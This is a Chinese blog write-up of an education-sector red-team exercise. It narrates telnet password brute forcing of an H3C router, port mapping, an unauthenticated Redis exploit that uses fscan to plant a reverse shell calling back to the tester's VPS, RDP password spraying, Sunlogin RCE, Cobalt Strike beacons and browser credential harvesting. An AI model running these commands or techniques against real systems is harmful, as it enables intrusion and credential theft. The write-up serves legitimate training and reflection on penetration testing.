『攻防』记一次EDU攻防演练

简介: 『攻防』记一次EDU攻防演练

背景

记一次EDU攻防,来之前还是有点怂的,因为前段时间刚打了其它地方EDU感受了一波,小部分目标有重合好难打啊(Too vegetable),不是很正式的感觉队伍也不多,目标分下来混战打,拿到目标表一看。

b8a08dcf2a85a9d98e27c953ca832174_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

我敲了一大半的内网地址大部分都是些视频监控系统

信息收集

拿到目标表之后就是信息收集了,挑了几个目标fscan快速识别一波资产没啥东西呀,web页面有个内网地址泄露记一下,可以确定这个ip是在服务器段的,我还没进去内网呢要这破ip干嘛

上超级弱口令检测工具扫一波弱口令,telnet口令爆破到一个h3c设备口令,成功登陆到设备是个管理员权限,开启web访问看了下有ssl vpn功能和授权,那么可以直接建ssl vpn把内网打通。

254ce4fbada41cb297058dcccfb254ba_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

菜狗不会配啊,只有抓苦力找L师傅给我看看了

0ede4fe6eb904e627f99e1b2e72af69a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

白嫖L师傅干活给了个设备型号让他去翻一波手册,吃完饭回来L师傅很自信跟我说你的需求我清楚了不就把内网放出来嘛(简简单单),L师傅远程我电脑telnet命令行配置界面敲下神秘代码(高手高手),然后piapia打脸哈哈哈

42f3b7abe3360f3b03a128c4e08df5f4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

设备太老了第一条命令就配不上,网上能找到的手册都是命令行配置,web界面配置L师傅看了半天也没整起,ssl vpn端口是通了但是连不上啊,吐槽了一波L师傅不靠谱,piapia打脸的L师傅试图解释一波(这设备出厂我都还在上初中怎么这设备还不退市啊),浪费一个小时时间没搞出来已经晚上一点了,睡觉吧明天找c师傅帮忙看看。

93488c031f5ceaca37a5ceb969134281_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

第二天找c师傅看了一下也搞不上敲了这下咋办啊,设备有telnet、ping功能,看了下设备上路由表确定了有2、3、5、6网段,telnet测试了一波网段一头一尾的IP,根据端口开放情况确定了2网段都是些服务器、3网段没法确定、5网段应该也是部分服务器段还有些无线ap设备。

72608e40b7125473a4be784813275025_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

通过telnet登陆到5网段的无线AP,可以执行部分命令,如ifconfig、ps -aux,其它命令都被屏蔽了,web界面比较简单没有什么功能,没有找到相关的漏洞。

b1c15d6101f6a4a15ad6a248a8b17784_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

翻了下官网的产品手册,看到一个无线网关的设备手册里面功能有vpn功能,那如果能找到这个无线网关设备不就可以做个vpn了吗

1b6706e563ac95cdb9ff7d9c5b1e3791_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

找了一圈没找到无线网关,放弃了,还是想想其他办法吧。现在我们手上有外网路由器的管理权限还有内网无线ap的权限,外网路由器可以telnet、ping探测IP和端口存活、nat端口映射。

那现在我们只有笨方法了,试试运气去探测内网的脆弱端口如22、1433、3389、6379、7001,说干就干,之前在信息收集的时候确定了靶标IP段在2段,那么我们直接按照靶标的IP前后去探测上面的脆弱端口,如果端口开放那么我们就在路由器上做个映射到公网上面。

简单探测了一波22端口写好nat配置到路由器上面先爆破一下

39f4be40d44baa94fb41f899e37f5595_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

突破口

人麻了,一个弱口令都没有,IP继续往前推探测6379端口,发现一个redis服务。

97c6c62e408f213066942fb1884658a5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总算找到一个可以打的端口,这里在华三路由器telnet过去我不知道为啥我输入info没有返回未授权的信息,映射到外网输入info是直接返回未授权,直接端口映射到外网直接用fscan打一下。

799663a71f338dd89c72467a52e247b5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

芜湖,fscan创建个计划任务弹到vps上面。

fscan_amd64.exe -h *.*.*.* -p 6379 -rs *.*.*.*:1234

等待获取到shell

042368440b92e8709d2d7e4fbe0d902a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

芜湖,冲冲冲

2fe15c1b45c0d65e874d64072ba5c370_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

内网横向

拿到了内网机器权限,直接开冲,先上一波fscan撞一波之前我们收集到的密码。

fscan_amd64.exe -h *.*.*.*/16 -pa 3389 -pwd ***** -np

运气比较好,撞密码撞到了两个机器,上个向日葵rce继续冲。

c563bddf4f53387b6ce92321a1c1c1d7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

内网翻出来一堆向日葵rce,能正常执行命令的就一台,难受了呀,powershell上线到cs上面,加账号远程到服务器,常规操作翻文件、浏览器密码、找内网管理员IP这些。

数据库账号,成功连接到数据库。

0effe1c027d496825a8c4f1f351223a2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

QQ文件里面有向日葵远程码,可惜了连接不上。

8d7282fcb091fd77c62c05f520e9d0d0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

在日志里面看登陆日志确定管理员IP,探测了下管理员地址不在线,上线另外两个rdp爆破出来的机器,浏览器保存了上网行为管理密码,直接登陆到后台了。

f51fcc14cbc26c0494af1b246d50c3e2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

刚才fscan扫描出一些交换机设备,尝试用同样的密码登陆,拿到了8台交换机权限。

6ed8bc73696fe2991ea8d74f56a95669_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

网络设备分数上限2k,之前无线ap已经把分数打满了,交了也是白交,继续看靶标系统和虚拟化平台,没有一个能可以打的,刚才的设备万能密码也没用。

5f06ce11a71192ffac182287da6ff294_640_wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1.jpg

kscan再扫描下,发现一些应该是移动终端设备,adb直接连接上去大概60台左右算物联网分数上限直接满了,靶标拿不下难受啊,就这样吧交报告溜了溜了。

总结

这次攻防整体的反思,外网打点信息收集尽量宽泛仔细一些,在现场打压力还是大的打不出来东西就是在坐牢,和队伍里师傅第一次协作不是很好没有沟通好打哪个目标好点,师傅第一次打也很懵逼,我打的多之前都是旁边辅助混子哈哈哈,信息同步还是比较重要的,内网横向这块还得学啊太菜了太菜了,还有就是免杀和bypass av跟师傅们学了一波姿势,之前没弄过上不了线真是一脸懵逼,最后差个几千分结束了。

文章里面这个目标案例打的也不是像我写的这么顺利,在测试脆弱端口的时候人麻了,测试了有个一个多小时一个能打的都没有,中午去吃饭路上都想着回来写python脚本做telnet批量测试,吃饭回来坐在那摆烂随便测了下结果测出个redis未授权才撕开了一个口子。

还有就是打的时候一定不能把自己轴进去了,一定要多跟队伍里师傅沟通想法怎么做,多个人多种思路,一个点上浪费了太多时间一定要及时调整寻找其它突破点,这个在突破到内网那里我就很轴,当时我就想把ssl vpn建立起来但是就是建立不起来,c师傅喊我换个思路把端口映射出来打,最后想想确实在ssl vpn那块浪费太多时间,一定及时调整自己思路。

文章到此结束,写到这里还是觉得内容比较少不够精彩,纯当记录混个稿费吧哈哈哈,文章内容姿势比较少,师傅们多分享下外网打点、bypass av这块的文章,让弟弟也学习一下欢迎各位师傅们来交流。

相关文章
|
1天前
|
PHP
攻防世界18.fileclude
攻防世界18.fileclude
|
1天前
|
SQL 数据库 数据安全/隐私保护
攻防世界14-inget
攻防世界14-inget
|
1天前
|
安全 PHP 数据安全/隐私保护
攻防世界17.fileinclude
攻防世界17.fileinclude
|
13天前
|
安全 网络安全
网络安全攻防实战演练:技术探索与实践
【5月更文挑战第1天】网络安全攻防实战演练,通过模拟攻击与防御,提升组织应对网络安全威胁的能力。演练包括准备、攻击、防御和总结四个阶段,涉及环境搭建、攻击技术应用、防御措施执行及后期评估。此类演练有助于检验安全防护能力,提升应急响应速度,暴露系统隐患,加强团队协作,是保障网络安全的关键实践。
|
1月前
|
存储 安全 数据安全/隐私保护
【攻防世界】catcat-new
【攻防世界】catcat-new
|
5月前
|
SQL 数据库
攻防世界-fakebook
攻防世界-fakebook
24 0
|
7月前
攻防世界 Mysterious
攻防世界 Mysterious
35 0
|
9月前
|
云安全 存储 运维
攻防演练 ,阿里云六大实战防守技能与五大建议
本文主要介绍如何利用云特性和原生安全优势,在防守中获得主动权,阿里云更新最新具备的实战能力和防守策略建议。
464 0
攻防演练 ,阿里云六大实战防守技能与五大建议
|
10月前
攻防世界miscBanmabanma
攻防世界miscBanmabanma
58 0
|
12月前
|
存储 安全 Shell
【实战】记一次攻防演练之vcenter后渗透利用(下)
【实战】记一次攻防演练之vcenter后渗透利用
409 0